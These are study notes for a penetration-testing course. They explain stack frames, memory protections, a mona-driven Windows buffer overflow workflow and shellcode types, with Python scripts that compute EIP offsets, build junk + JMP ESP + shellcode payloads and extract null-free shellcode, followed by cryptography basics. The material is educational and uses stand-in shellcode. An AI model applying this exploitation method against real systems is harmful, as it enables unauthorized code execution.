My PTP Notes from eLearnSecurity PDFs with help by Netriders Academy

CPU Architecture
  1. push ebp → save the caller's frame base (old ebp) on the stack.
  2. mov ebp, esp → ebp now points at the base of the new stack frame.
  3. sub esp, X → reserve X bytes of stack space for the local variables.
  1. mov esp, ebp → discard the locals; esp points back at the saved ebp.
  2. pop ebp → restore the caller's ebp.
  3. ret → pop the saved return address into eip and jump to it. This saved return address is what a stack overflow overwrites.
  1. Address Space Layout Randomization (ASLR): the OS loads the same executable at a different base address each time it runs. A DLL built without ASLR support (not linked with /DYNAMICBASE) is loaded at a fixed address, so its instructions (for example a JMP ESP) can be used even when the main program is randomized.
  2. Data Execution Prevention (DEP): a hardware and software measure that prevents code from executing from memory pages that are not explicitly marked executable, so shellcode placed on the stack cannot simply run.
  3. Stack cookies (canaries): the function prologue places a value next to the return address on the stack, and the epilogue checks that it is unchanged before returning; an overflow that reaches the return address also corrupts the cookie and the program aborts.
  1. .\setpaths.bat: sets up the environment and shows whether NASM is working.
  2. nasm -f win32 demo1.asm -o demo1.obj: run the assembler and create the object file.
  3. GoLink.exe /entry _main demo1.obj kernel32.dll user32.dll: link the object file into an executable, resolving its imports from the listed DLLs.
  1. Use the IDE's compiler.
  2. Or from the command line with gcc (the -m32 flag produces a 32-bit binary, which is what Immunity Debugger works with): gcc -m32 HelloStudents.c -o HelloStudents.exe
  • Stop the program while it is running.
  • Analyze the stack and its data.
  • Inspect registers.
  • Change the program or program variables and more.
  1. Check whether the program is vulnerable to a buffer overflow: run it and pass a very long input of A's. If the program crashes (EIP ends up as 0x41414141), it is vulnerable.
  2. Determine how many bytes of input are needed to reach the saved return address (EIP).
  3. Put the address of the function we want to execute at that offset.
  1. Analyze the program in a debugger: Immunity Debugger for 32-bit targets, x64dbg for 64-bit targets.
  2. Disassemble the executable with objdump: objdump -d -Mintel goodpwd.exe > disassemble.txt
C++
Python
  • \x00 is the null byte. strcpy stops copying as soon as it meets a null byte in the source string.
  • So the payload we use must be free of null bytes, otherwise it is truncated and will not work.
  • We can find the offset to EIP manually by entering values that follow a pattern, or:
  • use IDA or Immunity Debugger.
  • use tools such as pattern_create (sends a unique, non-repeating pattern to the vulnerable program) and pattern_offset (tells how many bytes precede the value that landed in EIP). These scripts ship with Metasploit (we will see how they work in the Metasploit module).
  • use mona with Immunity Debugger.
  1. Clone the project: git clone https://github.com/corelan/mona.git
  2. Copy mona.py to C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands.
  3. Set the working folder where mona saves its output by running this inside Immunity Debugger: !mona config -set workingfolder C:\ImmunityLogs\%p
  4. Open the vulnerable program in Immunity Debugger.
  5. Create the cyclic pattern: !mona pc 100 (use a length larger than the buffer you are testing).
  6. Copy the pattern into the exploit script as the payload.
  7. Run the exploit script.
  8. Run the vulnerable program under Immunity Debugger and let it crash.
  9. Find how many bytes precede EIP: !mona po <value in EIP>, e.g. !mona po 0x41356141 (!mona findmsp does the same search over all registers).
  10. To reach our shellcode we need an instruction that jumps to ESP. There are several ways to find one: 1) searching the disassembly, 2) the findjmp2 tool, 3) mona: !mona jmp -r esp -m kernel . Pick an address from a module without ASLR and whose bytes contain no null byte.
  11. Build the payload: junk data of the length reported by !mona po, then the address of the JMP ESP (written little-endian), then the shellcode.
  12. Let mona suggest an exploit skeleton automatically: !mona suggest
  13. To list modules without ASLR: !mona noaslr
  14. To list all loaded modules and their protections: !mona modules
  1. Fill the buffer with junk data up to the return address.
  2. Overwrite EIP with the address of a JMP ESP.
  3. Place the payload after it: junk data + JMP ESP address + shellcode (the malware or program to run).
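The offset-finding and payload-building steps above, as an added Python example that is not part of the original notes, of Metasploit or of mona: it rebuilds the cyclic pattern that pattern_create / !mona pc produce, computes the offset from the crashed EIP the way pattern_offset / !mona po do, and assembles junk + JMP ESP address + shellcode, refusing any null byte because strcpy would truncate the payload there. The crash value 0x41356141, the JMP ESP address 0x7C86467B, the NOP sled and the 4-byte INT3 stand-in shellcode are all constructed for the demo; on a real target take the address from !mona jmp -r esp.

```python
import string
import struct

# Assumed JMP ESP address for the demo (hypothetical; pick a real one with !mona jmp -r esp).
JMP_ESP = 0x7C86467B

# Constructed stand-in for real shellcode: four INT3 breakpoints, so the debugger
# stops as soon as execution lands on them.
SHELLCODE = b"\xcc" * 4


def pattern_create(length):
    """Build a unique cyclic pattern using the same alphabet as pattern_create.rb / !mona pc.

    Every 4-byte window in the pattern is distinct, so the value that lands in
    EIP identifies exactly one position in the input.
    """
    if length > 26 * 26 * 10 * 3:
        raise ValueError("a pattern longer than 20280 bytes would start to repeat")
    triplets = (u + l + d for u in string.ascii_uppercase
                for l in string.ascii_lowercase
                for d in string.digits)
    return "".join(triplets)[:length]


def pattern_offset(eip_value, length=5000):
    """Return how many bytes precede the 4 bytes that landed in EIP (what !mona po does).

    EIP is displayed as a 32-bit number, but the bytes sit in memory little-endian,
    so 0x41356141 corresponds to the input bytes b"Aa5A".
    """
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).encode().find(needle)  # -1 if EIP did not come from our pattern


def is_null_free(chunk):
    """strcpy() stops at the first \\x00, so every part of the payload must pass this check."""
    return b"\x00" not in chunk


def build_payload(offset, jmp_esp, shellcode, nop_sled=16):
    """junk + JMP ESP address (little-endian) + NOP sled + shellcode.

    The NOP sled is an assumption of this demo: it gives a little slack if ESP
    does not point exactly at the first shellcode byte after the JMP ESP.
    """
    ret = struct.pack("<I", jmp_esp)
    for name, chunk in (("JMP ESP address", ret), ("shellcode", shellcode)):
        if not is_null_free(chunk):
            raise ValueError("%s contains a null byte; strcpy would truncate the payload" % name)
    return b"A" * offset + ret + b"\x90" * nop_sled + shellcode


if __name__ == "__main__":
    crashed_eip = 0x41356141          # constructed: what the debugger would show after the crash
    offset = pattern_offset(crashed_eip)
    print("pattern sent :", pattern_create(24), "...")
    print("offset to EIP:", offset)
    payload = build_payload(offset, JMP_ESP, SHELLCODE)
    print("payload      :", payload.hex())
```

The same three functions are what the exploit script needs in order: send pattern_create() output, read EIP in Immunity Debugger, feed it to pattern_offset(), then send build_payload(). An address such as 0x00401000 is rejected because its little-endian bytes start with \x00.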
  • Compiler → a translator that turns the whole source code into machine code before the program runs. The output is platform dependent. It is fast because the translated program runs directly on the CPU.
  • Interpreter → executes the source code directly, statement by statement; no machine code is produced. The source is platform independent, but every target device needs its own interpreter. It is slower because translation happens at run time.
  • Intermediate → combines the two: the source is compiled to an intermediate language (IL) that is shipped to the target device, and the device compiles the IL to machine code.
  • IDE → Integrated Development Environment.
  • to disable automatic close of the console:-
  • Pointer variables hold memory addresses.
  • Memory is byte-addressable: each address refers to 1 byte = 8 bits.
  • &m → returns the address of variable m.
  • *m → returns the value stored at the address held in pointer m.
  • We declare a pointer as: int *m;
  • Local shellcode or privilege escalation shellcode → requires local access to the machine (an existing low-privileged session) and is used to obtain higher privileges.
  • Remote shellcode or network shellcode or RCE (Remote Code Execution) shellcode → is delivered over a network protocol and provides remote access to the machine.
  1. Connect-back (reverse) shellcode: the victim machine opens a connection to the attacker's machine. It usually gets through firewalls and detection systems because the connection is outbound from the victim.
  2. Bind (normal) shellcode: the shellcode opens a listening port on the victim and the attacker connects to it. Inbound firewall rules or detection systems often block it.
  3. Socket reuse shellcode: a socket is an IP address plus a port used to establish a connection. This shellcode reuses the already open connection over which the exploit was delivered, before it is closed, instead of creating a new one.
  • Reverse and bind shellcode are the most common. Socket reuse shellcode is not widely used because of its complexity and because the vulnerabilities it was written for have since been fixed.
  • Staged shellcode: used when the shellcode the attacker wants to send is larger than the space available in the buffer.
  1. Egg hunter: the shellcode is split into two stages. The first stage is a small piece of code that searches memory for a tag (the egg) marking the second, larger stage and jumps to it.
  2. Omelet: the shellcode is split into several small pieces (eggs) that are sent separately; a small first stage finds them in memory and reassembles them before executing.
  3. Download and execute: the first stage connects to the internet, downloads the rest of the shellcode and executes it.
  1. The Sleep function lives in kernel32.dll. To get its address, open kernel32.dll in Immunity Debugger or use the arwin tool (arwin kernel32.dll Sleep). The address is specific to that Windows version and patch level.
  2. Write the assembly code.
  3. Assemble it, then disassemble the object file to get the binary (machine) code.
  4. Write the bytes into the shellcode string with the \x prefix and no spaces.
  • If we write the shellcode as a normal text string it will not execute: the bytes must be written as binary escapes (\x..) so that the exact machine code ends up in memory.
  • Ready-made shellcode can be found in the Exploit-DB shellcode archive.

notes:-

  • If we have assembly code and want its binary code, we generate the object file with (nasm -f win32 file.asm -o file.obj) and then disassemble it with (objdump -d -Mintel file.obj > file.txt).
  • If we have assembly code and want an executable, we generate the object file and then run the linker on it.
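Steps 3 and 4 of the Sleep shellcode procedure and the nasm/objdump note above, as an added Python example that is not part of the original notes: it parses objdump -d -Mintel output into raw bytes, writes them as a \x string, and reports where null bytes sit. The two objdump listings are constructed by hand (the Sleep address 0x7c802446 is assumed for the demo; look it up on the target with arwin). The first calls Sleep(1000) with push 0x3e8, which encodes the 1000 as a 32-bit immediate and drags in two null bytes; the second builds the same argument from xor eax,eax / mov ax,0x3e8 and is null-free.

```python
import re

# Constructed objdump -d -Mintel output: naive Sleep(1000) stub.
# Sleep = 0x7c802446 is an assumed address for the demo.
NAIVE_SLEEP = """
00000000 <_main>:
   0:\t68 e8 03 00 00       \tpush   0x3e8
   5:\tb8 46 24 80 7c       \tmov    eax,0x7c802446
   a:\tff d0                \tcall   eax
"""

# Constructed objdump output of the null-free rewrite: same Sleep(1000) call,
# but 0x3e8 is built in ax so no 32-bit immediate with zero bytes is emitted.
NULL_FREE_SLEEP = """
00000000 <_main>:
   0:\t31 c0                \txor    eax,eax
   2:\t66 b8 e8 03          \tmov    ax,0x3e8
   6:\t50                   \tpush   eax
   7:\tb8 46 24 80 7c       \tmov    eax,0x7c802446
   c:\tff d0                \tcall   eax
"""

ADDR_COLUMN = re.compile(r"^\s*[0-9a-f]+:$")


def objdump_to_shellcode(dump):
    """Collect the opcode bytes from objdump's 'addr:<tab>bytes<tab>mnemonic' lines.

    Only the middle (bytes) column is decoded, so a mnemonic such as 'call'
    can never be mistaken for hex. Continuation lines of long instructions
    have the same shape and are picked up too.
    """
    out = bytearray()
    for line in dump.splitlines():
        fields = line.split("\t")
        if len(fields) < 2 or not ADDR_COLUMN.match(fields[0]):
            continue
        out += bytes.fromhex(fields[1])      # fromhex() ignores the spaces between bytes
    return bytes(out)


def to_c_string(shellcode):
    """Render the bytes as the \\x-escaped string that goes into the exploit."""
    return "".join("\\x%02x" % b for b in shellcode)


def null_positions(shellcode):
    """Offsets of every \\x00: strcpy-style copies stop at the first one."""
    return [i for i, b in enumerate(shellcode) if b == 0]


if __name__ == "__main__":
    for label, dump in (("naive", NAIVE_SLEEP), ("null-free", NULL_FREE_SLEEP)):
        sc = objdump_to_shellcode(dump)
        print("%-9s %2d bytes  nulls at %s" % (label, len(sc), null_positions(sc)))
        print("          ", to_c_string(sc))
```

Running it against real objdump output is the same call: objdump_to_shellcode(open("file.txt").read()). Check null_positions() before pasting the string into an exploit; if it is not empty, rewrite the instruction that produced the zero (as done above for push 0x3e8) or encode the shellcode.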
  1. Confidentiality: ensure that only authorized users can access the information.
  2. Authentication: ensure that a subject is who it claims to be by checking its credentials against a trusted system.
  3. Integrity: ensure that only authorized users can change or alter the information.
  4. Non-repudiation: create proof so that senders cannot deny having sent their messages.
  1. ECB (Electronic Codebook): encrypts each block independently, so identical plaintext blocks produce identical ciphertext blocks.
  2. CBC (Cipher Block Chaining): each plaintext block is XORed with the previous ciphertext block before encryption (the first block with an IV), so every ciphertext block depends on all the blocks before it.
  • A public key algorithm is different from a public key certificate.
  • A public key algorithm is asymmetric encryption that uses two keys, public and private. Data is encrypted with the public key and decrypted with the private key.
  • A public key certificate belongs to PKI: a digital certificate that contains the public key and binds it to an identity. Here the keys are used the other way round, as a digital signature: the certificate is signed with the issuer's private key and the signature is verified with the issuer's public key.
  1. Known-plaintext attack: the attacker knows some plaintext and its corresponding ciphertext.
  2. Ciphertext-only attack: the attacker only knows ciphertext and tries to recover the plaintext.
  3. Chosen-plaintext attack: like known-plaintext, but the attacker can choose the plaintext that gets encrypted.
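The ECB versus CBC point above, as an added Python example that is not part of the original notes: a deliberately toy 8-byte block cipher (XOR with the key, then rotate the bytes; not secure, chosen only so the code runs without any library) is driven in both modes over a plaintext made of three identical blocks. ECB leaks the repetition as three identical ciphertext blocks; CBC hides it because each block is chained to the previous ciphertext. The key, IV and plaintext are constructed constants so the run is reproducible; real code uses a fresh random IV per message.

```python
BLOCK = 8  # toy block size in bytes


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def toy_block_encrypt(key, block):
    """Toy block cipher, NOT secure: XOR with the key, then rotate the bytes left by one."""
    x = xor(block, key)
    return x[1:] + x[:1]


def toy_block_decrypt(key, block):
    x = block[-1:] + block[:-1]          # undo the rotation
    return xor(x, key)


def blocks(data):
    if len(data) % BLOCK:
        raise ValueError("input must be a multiple of %d bytes (no padding in this toy)" % BLOCK)
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key, plaintext):
    """Every block is encrypted on its own: equal plaintext blocks give equal ciphertext blocks."""
    return b"".join(toy_block_encrypt(key, p) for p in blocks(plaintext))


def ecb_decrypt(key, ciphertext):
    return b"".join(toy_block_decrypt(key, c) for c in blocks(ciphertext))


def cbc_encrypt(key, iv, plaintext):
    """Each plaintext block is XORed with the previous ciphertext block (the IV for the first)."""
    prev, out = iv, []
    for p in blocks(plaintext):
        prev = toy_block_encrypt(key, xor(p, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ciphertext):
    prev, out = iv, []
    for c in blocks(ciphertext):
        out.append(xor(toy_block_decrypt(key, c), prev))
        prev = c
    return b"".join(out)


def repeated_blocks(ciphertext):
    """Number of ciphertext blocks that duplicate an earlier one: the ECB leak."""
    bs = blocks(ciphertext)
    return len(bs) - len(set(bs))


# Constructed demo inputs.
KEY = bytes(range(8))
IV = b"\x01" * 8
PLAINTEXT = b"ATTACK!!" * 3          # three identical blocks


if __name__ == "__main__":
    ecb = ecb_encrypt(KEY, PLAINTEXT)
    cbc = cbc_encrypt(KEY, IV, PLAINTEXT)
    print("ECB:", [b.hex() for b in blocks(ecb)], "repeats:", repeated_blocks(ecb))
    print("CBC:", [b.hex() for b in blocks(cbc)], "repeats:", repeated_blocks(cbc))
```

repeated_blocks() is the same test used when fingerprinting an unknown ciphertext: a count above zero on data with known repeated structure is a strong sign of ECB.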
After exploitation we move on to privilege escalation, for example by dumping the password hashes.